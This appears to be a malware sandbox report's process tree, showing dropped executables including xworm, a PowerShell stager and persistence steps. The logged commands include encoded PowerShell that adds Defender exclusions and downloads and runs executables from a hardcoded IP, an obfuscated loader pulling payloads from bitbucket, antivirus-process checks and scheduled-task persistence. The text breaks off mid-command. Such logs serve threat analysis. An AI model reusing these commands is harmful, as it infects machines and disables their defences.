C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2216.0.1947062147\1844271328" -parentBuildID 20221007134813 -prefsHandle 1476 -prefMapHandle 960 -prefsLen 18084 -prefMapSize 231738 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff4cfefe-46a2-443d-b2d6-3001c722bb39} 2216 "\\.\pipe\gecko-crash-server-pipe.2216" 1328 e9db558 socket7⤵PID:3376
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2216.1.583576314\1043566612" -parentBuildID 20221007134813 -prefsHandle 1628 -prefMapHandle 1624 -prefsLen 18674 -prefMapSize 231738 -appDir "C:\Program Files\Mozilla Firefox\browser" - {abab90a0-1759-4ee8-8650-e879899f02a0} 2216 "\\.\pipe\gecko-crash-server-pipe.2216" 1672 13ea1b58 gpu7⤵PID:1964
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2216.2.1729301610\247388199" -childID 1 -isForBrowser -prefsHandle 2244 -prefMapHandle 2240 -prefsLen 20508 -prefMapSize 231738 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f9199ad-2dcc-4c1d-b5c7-e54c5be39349} 2216 "\\.\pipe\gecko-crash-server-pipe.2216" 2260 191db358 tab7⤵PID:3504
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2216.3.1975318213\633038305" -childID 2 -isForBrowser -prefsHandle 2780 -prefMapHandle 2776 -prefsLen 20615 -prefMapSize 231738 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dec072ba-3825-4c22-b56c-91512ae4922d} 2216 "\\.\pipe\gecko-crash-server-pipe.2216" 2792 1a498758 tab7⤵PID:5192
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2216.4.468163288\1302960068" -childID 3 -isForBrowser -prefsHandle 2948 -prefMapHandle 2952 -prefsLen 20692 -prefMapSize 231738 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ce17bc2-8057-43f3-9a35-139377f97f73} 2216 "\\.\pipe\gecko-crash-server-pipe.2216" 2936 1c1cf658 tab7⤵PID:5256
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2216.5.138134476\2075626604" -parentBuildID 20221007134813 -prefsHandle 3204 -prefMapHandle 3200 -prefsLen 26187 -prefMapSize 231738 -appDir "C:\Program Files\Mozilla Firefox\browser" - {46dc1183-8894-42b0-b1aa-d97f8b3c55bc} 2216 "\\.\pipe\gecko-crash-server-pipe.2216" 3280 1f23e158 rdd7⤵PID:5740
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2216.6.1178014068\1410025172" -childID 4 -isForBrowser -prefsHandle 3656 -prefMapHandle 1156 -prefsLen 26759 -prefMapSize 231738 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee30b1bb-be76-4fae-8b8a-04230f73dea5} 2216 "\\.\pipe\gecko-crash-server-pipe.2216" 3696 e9de258 tab7⤵PID:5888
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2216.7.804091081\583418466" -childID 5 -isForBrowser -prefsHandle 3748 -prefMapHandle 924 -prefsLen 26759 -prefMapSize 231738 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f5811d8-0e77-418f-a1ea-31aa1881cfb8} 2216 "\\.\pipe\gecko-crash-server-pipe.2216" 3904 1e0e1958 tab7⤵PID:6056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2216.8.457453377\149623732" -childID 6 -isForBrowser -prefsHandle 4360 -prefMapHandle 4232 -prefsLen 27438 -prefMapSize 231738 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d2bb1d3-b18e-484d-a871-2cd494a4a4ed} 2216 "\\.\pipe\gecko-crash-server-pipe.2216" 4372 2767f58 tab7⤵PID:5076
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NorthSperm.exe"C:\Users\Admin\AppData\Local\Temp\Files\NorthSperm.exe"3⤵
- Drops file in Windows directory
PID:2500 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Surrey Surrey.cmd && Surrey.cmd && exit4⤵PID:2204
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:276
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4340
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:2716
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"5⤵PID:5044
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7195805⤵PID:3056
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "copehebrewinquireinnocent" Corpus5⤵
- System Location Discovery: System Language Discovery
PID:4196
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Utilize + ..\Verzeichnis + ..\Built + ..\Vessels + ..\Cradle + ..\Jaguar + ..\Comics + ..\Flux + ..\Liberal f5⤵PID:3704
-
-
C:\Users\Admin\AppData\Local\Temp\719580\Optimum.pifOptimum.pif f5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2380
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:3028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\file1.exe"C:\Users\Admin\AppData\Local\Temp\Files\file1.exe"3⤵
- Drops startup file
PID:2676
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"3⤵
- System Location Discovery: System Language Discovery
PID:1700
-
-
C:\Users\Admin\AppData\Local\Temp\Files\evetbeta.exe"C:\Users\Admin\AppData\Local\Temp\Files\evetbeta.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4236
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ExtremeInjector.exe"C:\Users\Admin\AppData\Local\Temp\Files\ExtremeInjector.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5652
-
-
C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"3⤵PID:5036
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Built.exe"3⤵PID:5704
-
C:\Users\Admin\AppData\Local\Temp\Files\Built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Built.exe"4⤵PID:6072
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\xworm.exe"C:\Users\Admin\AppData\Local\Temp\Files\xworm.exe"3⤵PID:3016
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵PID:1556
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="5⤵PID:1860
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;6⤵PID:5248
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 524⤵
- Program crash
PID:6124
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\VidsUsername.exe"C:\Users\Admin\AppData\Local\Temp\Files\VidsUsername.exe"3⤵PID:3084
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Recreation Recreation.bat & Recreation.bat4⤵PID:4396
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:3580
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:5108
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:5620
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵PID:1672
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 1951975⤵PID:5456
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "RESOLVEPHONESBLESSFRANK" Donated5⤵PID:6016
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Arthritis + ..\Canyon + ..\Knights + ..\Movies + ..\Sequence + ..\Nascar + ..\Solve + ..\Cio + ..\Strategy + ..\Amounts + ..\Hans + ..\America + ..\Provincial + ..\Downtown + ..\Browser + ..\Afford + ..\Info + ..\Ll + ..\Intersection + ..\Rj + ..\Poetry + ..\Reality + ..\Cliff l5⤵PID:1888
-
-
C:\Users\Admin\AppData\Local\Temp\195197\Earl.pifEarl.pif l5⤵PID:5556
-
C:\Users\Admin\AppData\Local\Temp\195197\Earl.pifC:\Users\Admin\AppData\Local\Temp\195197\Earl.pif6⤵PID:5108
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:2708
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\433412.exe"C:\Users\Admin\AppData\Local\Temp\Files\433412.exe"3⤵PID:1480
-
-
C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"3⤵PID:336
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe"C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe"3⤵PID:3528
-
-
C:\Users\Admin\AppData\Local\Temp\Files\keepvid-pro_full2578.exe"C:\Users\Admin\AppData\Local\Temp\Files\keepvid-pro_full2578.exe"3⤵PID:4492
-
-
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"3⤵PID:2720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 1684⤵
- Program crash
PID:888
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\shell.exe"C:\Users\Admin\AppData\Local\Temp\Files\shell.exe"3⤵PID:4980
-
-
C:\Users\Admin\AppData\Local\Temp\Files\discord.exe"C:\Users\Admin\AppData\Local\Temp\Files\discord.exe"3⤵PID:4792
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4576
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"4⤵PID:552
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\MePaxil.exe"C:\Users\Admin\AppData\Local\Temp\Files\MePaxil.exe"3⤵PID:2376
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Offensive Offensive.cmd & Offensive.cmd & exit4⤵PID:3284
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:2088
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:2608
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:5636
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"5⤵PID:2424
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 5436485⤵PID:3620
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BiddingVeRoutinesFilms" Bowling5⤵PID:4948
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Suzuki + ..\Major + ..\Tit + ..\Adjust + ..\Invest + ..\Severe + ..\Sony + ..\Prefers E5⤵PID:4780
-
-
C:\Users\Admin\AppData\Local\Temp\543648\Legend.pifLegend.pif E5⤵PID:1224
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Keyboard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST6⤵PID:2248
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Keyboard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST7⤵
- Scheduled Task/Job: Scheduled Task
PID:5552
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "ScanGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc onlogon /F /RL HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:1444
-
-
C:\Users\Admin\AppData\Local\Temp\543648\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\543648\RegAsm.exe6⤵PID:3056
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 155⤵PID:5244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\HEXABOT%20-GAMBL%C4%B0NGV2.0.exe"C:\Users\Admin\AppData\Local\Temp\Files\HEXABOT%20-GAMBL%C4%B0NGV2.0.exe"3⤵PID:2496
-
C:\Windows\system32\cmd.execmd /c gam.bat4⤵PID:4716
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#